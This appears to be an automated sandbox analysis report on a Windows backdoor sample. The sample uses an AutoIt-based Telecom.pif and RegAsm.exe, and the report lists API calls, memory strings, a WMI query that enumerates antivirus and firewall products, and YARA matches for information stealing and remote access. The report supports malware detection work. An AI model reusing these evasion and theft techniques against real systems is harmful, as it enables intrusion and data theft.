Source: Telecom.pif, 0000000B.00000003.1222451762.00000000044C9000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmp, EcoScape.pif, 00000013.00000002.1246780607.0000000000503000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Telecom.pif Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_00460A08 cpuid 11_2_00460A08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_0049E5F4 GetLocalTime, 11_2_0049E5F4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_0049E652 GetUserNameW, 11_2_0049E652
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_0047BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 11_2_0047BCD2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Code function: 0_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040350A
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\cmd.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Program Files\Windows Defender\MpCmdRun.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 11.3.Telecom.pif.4552c30.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.Telecom.pif.4552c30.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.Telecom.pif.4552c30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.RegAsm.exe.e30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.Telecom.pif.4552c30.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.Telecom.pif.454d480.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.Telecom.pif.4552c30.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.Telecom.pif.4552c30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.Telecom.pif.454d480.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.Telecom.pif.3ae5b58.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1475822561.0000000004557000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1477626000.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1475846355.0000000004544000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1475792127.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2437824814.0000000000E32000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1477657336.000000000455C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2443989987.0000000004514000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1477695668.000000000453D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2443989987.0000000004526000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Telecom.pif PID: 6936, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 1180, type: MEMORYSTR
Source: Telecom.pif Binary or memory string: WIN_81
Source: Telecom.pif Binary or memory string: WIN_XP
Source: Commander.0.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Telecom.pif Binary or memory string: WIN_XPe
Source: Telecom.pif Binary or memory string: WIN_VISTA
Source: Telecom.pif Binary or memory string: WIN_7
Source: Telecom.pif Binary or memory string: WIN_8

Remote Access Functionality

Source: Yara match File source: 11.3.Telecom.pif.4552c30.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.Telecom.pif.4552c30.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.Telecom.pif.4552c30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.RegAsm.exe.e30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.Telecom.pif.4552c30.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.Telecom.pif.454d480.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.Telecom.pif.4552c30.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.Telecom.pif.4552c30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.Telecom.pif.454d480.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.Telecom.pif.3ae5b58.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1475822561.0000000004557000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1477626000.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1475846355.0000000004544000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1475792127.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2437824814.0000000000E32000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1477657336.000000000455C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2443989987.0000000004514000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1477695668.000000000453D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2443989987.0000000004526000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Telecom.pif PID: 6936, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 1180, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004C2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 11_2_004C2263
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004C1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 11_2_004C1C61